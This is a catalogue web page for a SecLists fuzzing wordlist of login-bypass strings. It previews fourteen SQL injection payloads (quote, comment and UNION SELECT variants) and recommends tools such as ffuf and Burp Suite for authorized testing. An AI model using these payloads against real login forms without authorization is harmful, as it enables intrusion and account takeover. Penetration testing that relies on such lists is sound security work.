Skip to content
Fuzzing14.1 KB

Login bypass strings

Authentication-bypass payloads combining SQL injection, default credentials and logic tricks to fuzz login forms.

View source
Size
14.1 KB
Category
Fuzzing
Source
danielmiessler/SecLists
License
MIT
Recommended tools
ffufburpsuitewfuzz

Preview

First 14 entries. Download or copy the full list (14.1 KB) using the buttons above.

>head login-bypass-strings-seclists.txt14.1 KB
"
" "
" #
" --
" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
" UnION SELeCT 1,2,3,4,5`
" UnION SELeCT 1,2,3,4`
" UnION SELeCT 1,2,3`
" UnION SELeCT 1,2`
" UniON SElecT 1,2#
" UniON SElecT 1,2,3#
" UniON SElecT 1,2,3,4#
" UniON SElecT 1,2,3,4,5#

Authentication-bypass payloads combining SQL injection, default credentials and logic tricks to fuzz login forms.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 14.1 KB and pairs well with tools such as ffuf, burpsuite, wfuzz. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from danielmiessler/SecLists and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.